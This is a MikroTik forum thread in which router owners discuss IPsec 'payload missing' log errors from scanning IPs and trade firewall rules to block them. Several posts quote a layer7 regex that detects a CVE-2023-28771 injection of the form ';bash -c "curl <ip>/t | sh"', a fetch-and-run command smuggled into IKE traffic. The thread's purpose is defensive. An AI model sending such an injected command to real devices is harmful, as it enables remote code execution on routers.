Community discussions

MikroTik App
 
User avatar
depth0cert
just joined
Topic Author
Posts: 21
Joined: Thu Sep 08, 2022 11:03 pm

Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Mon Jun 05, 2023 10:03 pm

Hello.

Last week I often see "payload missing: SA" in the logs, today they were joined by "payload missing: NONCE". I use https://github.com/stamparm/maltrail/bl ... canner.txt to fill the block-lists for 500/UDP, 4500/UDP.
Perhaps there is a best practice to enhance IKEv2 without using white-sheets?
 12:18:49 ipsec,error payload missing: SA
 14:27:56 ipsec,error payload missing: SA
 19:25:38 ipsec,error payload missing: SA
 19:35:39 ipsec,error payload missing: SA
 20:19:57 ipsec,error payload missing: SA
 21:00:38 ipsec,error payload missing: SA
 21:20:38 ipsec,error payload missing: NONCE
 
 
User avatar
depth0cert
just joined
Topic Author
Posts: 21
Joined: Thu Sep 08, 2022 11:03 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Tue Jun 06, 2023 9:22 pm

14:00:02 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->xx:xx:xx:xx:xx:xx:500, len 277
14:00:02 ipsec,error payload missing: SA
14:05:08 ipsec,error payload missing: SA
14:05:09 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->xx:xx:xx:xx:xx:xx:500, len 277
17:23:43 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->xx:xx:xx:xx:xx:xx:500, len 277
17:23:43 ipsec,error payload missing: SA
17:25:32 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->xx:xx:xx:xx:xx:xx:500, len 277
17:25:32 ipsec,error payload missing: SA
17:48:30 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
17:48:30 ipsec,error payload missing: SA
17:48:38 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
17:48:38 ipsec,error payload missing: SA
18:00:49 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
18:00:49 ipsec,error payload missing: SA
18:14:30 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
18:14:30 ipsec,error payload missing: SA
18:37:57 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
18:37:57 ipsec,error payload missing: SA
18:41:25 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
18:41:25 ipsec,error payload missing: SA
19:44:54 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
19:44:54 ipsec,error payload missing: SA
19:50:15 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
19:50:15 ipsec,error payload missing: SA
len 277
 
Fesiitis
newbie
Posts: 45
Joined: Tue Sep 13, 2016 10:24 am
Location: Latvia, Riga

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Wed Jun 07, 2023 6:42 pm

I'm also seeing a bunch of errors like these for the last few days on all routers that have IPsec configured.
payloadmissing.PNG
I think these are new entries on top of the existing ones (identity not found for peer: FQDN: *something* and identity not found for peer: RFC822: research-scan@sysnet.ucsd.edu), related to this one - https://research-scan.sysnet.ucsd.edu/.
You do not have the required permissions to view the files attached to this post.
 
User avatar
depth0cert
just joined
Topic Author
Posts: 21
Joined: Thu Sep 08, 2022 11:03 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Wed Jun 07, 2023 11:10 pm

169.228.66.0/24
- blocked in raw/prerouting a long time ago;
109.207.200.47, 109.207.200.44 and others
- blocked 500/UDP with packet-size=! in raw/prerouting.

You can add log-rule in prerouting with 500/UDP and check ip of attacker (109.207.200.0/24). Now log is clean.
 
pizzydmgm
just joined
Posts: 1
Joined: Wed Jan 25, 2023 5:25 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Fri Jun 09, 2023 8:32 am

169.228.66.0/24
- blocked in raw/prerouting a long time ago;
109.207.200.47, 109.207.200.44 and others
- blocked 500/UDP with packet-size=! in raw/prerouting.

You can add log-rule in prerouting with 500/UDP and check ip of attacker (109.207.200.0/24). Now log is clean.
Hello sir. I have same errors in my router. Can you please share the full firewall rule to block this atack. Thank you in advance!
 
zarkominic
just joined
Posts: 3
Joined: Mon Jun 12, 2023 1:53 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Mon Jun 12, 2023 1:57 pm

169.228.66.0/24
- blocked in raw/prerouting a long time ago;
109.207.200.47, 109.207.200.44 and others
- blocked 500/UDP with packet-size=! in raw/prerouting.

You can add log-rule in prerouting with 500/UDP and check ip of attacker (109.207.200.0/24). Now log is clean.
Hello. I have same errors in my router. Can you please share the full firewall rule to block this atack. Thank you in advance!
 
User avatar
depth0cert
just joined
Topic Author
Posts: 21
Joined: Thu Sep 08, 2022 11:03 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Sat Jun 17, 2023 1:26 am

/ip/firewall/layer7-protocol/add name=CVE-2023-28771 regexp=";bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n"
/ip/firewall/filter/add action=drop chain=input dst-port=500 layer7-protocol=CVE-2023-28771 protocol=udp

https://packetstormsecurity.com/files/1 ... ution.html
 
zarkominic
just joined
Posts: 3
Joined: Mon Jun 12, 2023 1:53 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Mon Jun 19, 2023 7:53 am

/ip/firewall/layer7-protocol/add name=CVE-2023-28771 regexp=";bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n"
/ip/firewall/filter/add action=drop chain=input dst-port=500 layer7-protocol=CVE-2023-28771 protocol=udp

https://packetstormsecurity.com/files/1 ... ution.html
Thank you very much for your reply. I'll will check this out and implement to my router.
 
LurkerBeta
just joined
Posts: 13
Joined: Fri Jul 09, 2021 8:50 am

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Mon Jul 31, 2023 8:46 am

It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, еherefore, it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) it protects against payload messing:sa. What kind of payload missing: nonce I don't know at the moment and want to know. The day before yesterday I caught 2 events.
 
zarkominic
just joined
Posts: 3
Joined: Mon Jun 12, 2023 1:53 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Thu Aug 03, 2023 7:58 am

It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, еherefore, it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) it protects against payload messing:sa. What kind of payload missing: nonce I don't know at the moment and want to know. The day before yesterday I caught 2 events.
Hello sir, Can you please send me a link for your solution. I still have many this type of errors in log. I suppose public sharing of the other sites links are not allowed, therefore my mail is zarkominic.atm@gmail.com
Thanks in advance.
 
sashkok
just joined
Posts: 1
Joined: Sun May 07, 2023 5:30 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Thu Aug 03, 2023 2:11 pm

It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, еherefore, it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) it protects against payload messing:sa. What kind of payload missing: nonce I don't know at the moment and want to know. The day before yesterday I caught 2 events.
Thank you. In my case it's working!!!
 
durip
just joined
Posts: 1
Joined: Mon Jul 17, 2023 9:08 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Tue Dec 26, 2023 7:44 pm

Hello,

what is proper expression? I tried
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\"

but still error logs payload missing: SA ...
Thanks.

It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, еherefore, it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) it protects against payload messing:sa. What kind of payload missing: nonce I don't know at the moment and want to know. The day before yesterday I caught 2 events.

Who is online

Users browsing this forum: baragoon, Bing [Bot], duartev, GoogleOther [Bot], ItchyAnkle, menyarito, sergejs and 88 guests